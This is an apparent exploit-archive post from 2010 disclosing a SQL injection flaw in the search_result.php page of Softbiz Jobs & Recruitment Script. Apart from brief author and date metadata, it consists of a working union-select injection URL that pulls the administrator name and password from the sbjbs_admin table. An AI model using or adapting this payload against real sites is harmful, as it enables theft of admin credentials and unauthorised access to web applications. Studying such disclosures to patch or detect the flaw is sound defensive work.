Home / os / winme

Softbiz Jobs / Recruitment Script (search_result.php) SQL In

Posted on 10 March 2010

================================================================================= Softbiz Jobs / Recruitment Script (search_result.php) SQL Injection Vulnerability ================================================================================= ----------------------------Information------------------------------------------------ +Name : Softbiz Jobs & Recruitment Script SQL INJECTION search_result.php +Autor : Easy Laster +Date : 10.03.2010 +Script : Softbiz Jobs & Recruitment Script +Price : 129$ +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/sbjbs/search_result.php?cid= +Exploitable : http://www.site.com/sbjbs/search_result.php?cid=9999999+union+select+1 ,concat(sb_admin_name,0x3a,sb_pwd),3,4+from+sbjbs_admin# ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP